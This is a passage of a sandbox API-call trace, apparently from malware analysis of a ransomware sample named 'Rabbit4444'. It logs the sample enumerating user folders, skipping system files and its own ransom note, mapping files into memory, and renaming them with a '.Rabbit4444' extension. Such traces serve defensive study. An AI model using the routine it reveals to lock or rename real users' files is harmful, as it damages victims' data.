(lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="Rabbit4444.exe") returned -1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootmgr") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="pagefile.sys") returned -1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="ids.txt") returned 1 [0060.495] lstrcmpiW (lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTUSER.DAT") returned 1 [0060.495] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" [0060.495] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x22) returned 1 [0060.496] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x6) returned 1 [0060.496] lstrlenW (lpString="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0060.496] lstrlenW (lpString="Rabbit4444") returned 10 [0060.496] lstrcmpiW (lpString1="egtrans-ms", lpString2="Rabbit4444") returned -1 [0060.496] lstrlenW (lpString=".dll") returned 4 [0060.496] lstrcmpiW (lpString1="s-ms", lpString2=".dll") returned 1 [0060.496] lstrlenW (lpString=".lnk") returned 4 [0060.496] lstrcmpiW (lpString1="s-ms", lpString2=".lnk") returned 1 [0060.496] lstrlenW (lpString=".ini") returned 4 [0060.496] lstrcmpiW (lpString1="s-ms", lpString2=".ini") returned 1 [0060.496] lstrlenW (lpString=".sys") returned 4 [0060.496] lstrcmpiW (lpString1="s-ms", lpString2=".sys") returned 1 [0060.496] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.496] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.496] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15180722095) returned 1 [0060.497] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=524288) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0060.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0060.497] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x280 [0060.500] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0060.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0060.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0060.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0060.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0060.513] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbff0 | out: lpPerformanceCount=0x11cbff0*=15182401717) returned 1 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0060.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0060.513] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0060.518] CloseHandle (hObject=0x280) returned 1 [0060.518] CloseHandle (hObject=0x260) returned 1 [0060.518] wsprintfW (in: param_1=0x11cc2f0, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.Rabbit4444") returned 120 [0060.519] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms.Rabbit4444" (normalized: "c:\\users\\default\\ntuser.dat{fae9930d-933c-11e7-a51d-b808901d6c9b}.tmcontainer00000000000000000002.regtrans-ms.rabbit4444"), dwFlags=0x1) returned 1 [0060.519] InterlockedExchangeAdd (in: Addend=0xff820, Value=524288 | out: Addend=0xff820) returned 1757184 [0060.519] InterlockedExchangeAdd (in: Addend=0xff82c, Value=16 | out: Addend=0xff82c) returned 79 [0060.519] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0060.519] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.519] lstrcmpiW (lpString1="Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.519] lstrcmpiW (lpString1="Pictures", lpString2="Rabbit4444.exe") returned -1 [0060.519] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0060.519] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0060.520] lstrcmpiW (lpString1="Pictures", lpString2="NTUSER.DAT") returned 1 [0060.520] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0060.520] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Pictures", dwFileAttributes=0x10) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0060.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102750 [0060.520] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122208 | out: ListHead=0x122128, ListEntry=0x122208) returned 0x122268 [0060.520] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="Rabbit4444.exe") returned -1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0060.520] lstrcmpiW (lpString1="PrintHood", lpString2="NTUSER.DAT") returned 1 [0060.520] lstrcpyW (in: lpString1=0x11ceb82, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0060.520] SetFileAttributesW (lpFileName="C:\\Users\\Default\\PrintHood", dwFileAttributes=0x2412) returned 1 [0060.521] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\PrintHood\r\n") returned 45 [0060.521] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\PrintHood\r\n") returned 45 [0060.521] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.521] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcbc [0060.521] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2d, lpOverlapped=0x0) returned 1 [0060.523] CloseHandle (hObject=0x260) returned 1 [0060.523] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0060.523] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.523] lstrcmpiW (lpString1="Recent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.523] lstrcmpiW (lpString1="Recent", lpString2="Rabbit4444.exe") returned 1 [0060.523] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0060.524] lstrcmpiW (lpString1="Recent", lpString2="NTUSER.DAT") returned 1 [0060.524] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0060.524] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Recent", dwFileAttributes=0x2412) returned 1 [0060.524] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Recent\r\n") returned 42 [0060.524] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Recent\r\n") returned 42 [0060.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.524] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce9 [0060.524] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2a, lpOverlapped=0x0) returned 1 [0060.526] CloseHandle (hObject=0x260) returned 1 [0060.526] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="Rabbit4444.exe") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0060.526] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0060.527] lstrcmpiW (lpString1="Saved Games", lpString2="NTUSER.DAT") returned 1 [0060.527] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0060.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0060.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x3a) returned 0x115090 [0060.527] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122228 | out: ListHead=0x122128, ListEntry=0x122228) returned 0x122208 [0060.527] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="Rabbit4444.exe") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0060.527] lstrcmpiW (lpString1="SendTo", lpString2="NTUSER.DAT") returned 1 [0060.527] lstrcpyW (in: lpString1=0x11ceb82, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0060.527] SetFileAttributesW (lpFileName="C:\\Users\\Default\\SendTo", dwFileAttributes=0x2412) returned 1 [0060.527] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\SendTo\r\n") returned 42 [0060.527] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\SendTo\r\n") returned 42 [0060.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.528] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd13 [0060.528] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2a, lpOverlapped=0x0) returned 1 [0060.529] CloseHandle (hObject=0x260) returned 1 [0060.529] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="Rabbit4444.exe") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0060.530] lstrcmpiW (lpString1="Start Menu", lpString2="NTUSER.DAT") returned 1 [0060.530] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0060.530] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Start Menu", dwFileAttributes=0x2412) returned 1 [0060.530] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Start Menu\r\n") returned 46 [0060.530] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Start Menu\r\n") returned 46 [0060.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.530] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd3d [0060.531] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2e, lpOverlapped=0x0) returned 1 [0060.532] CloseHandle (hObject=0x260) returned 1 [0060.532] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0060.532] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.532] lstrcmpiW (lpString1="Templates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.532] lstrcmpiW (lpString1="Templates", lpString2="Rabbit4444.exe") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0060.533] lstrcmpiW (lpString1="Templates", lpString2="NTUSER.DAT") returned 1 [0060.533] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0060.533] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Templates", dwFileAttributes=0x2412) returned 1 [0060.533] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Templates\r\n") returned 45 [0060.533] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Templates\r\n") returned 45 [0060.533] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.534] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd6b [0060.534] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2d, lpOverlapped=0x0) returned 1 [0060.535] CloseHandle (hObject=0x260) returned 1 [0060.535] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0060.535] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.535] lstrcmpiW (lpString1="Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.535] lstrcmpiW (lpString1="Videos", lpString2="Rabbit4444.exe") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0060.536] lstrcmpiW (lpString1="Videos", lpString2="NTUSER.DAT") returned 1 [0060.536] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0060.536] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Videos", dwFileAttributes=0x10) returned 1 [0060.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0060.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x30) returned 0xf74f8 [0060.536] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122308 | out: ListHead=0x122128, ListEntry=0x122308) returned 0x122228 [0060.536] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0060.536] FindClose (in: hFindFile=0x102850 | out: 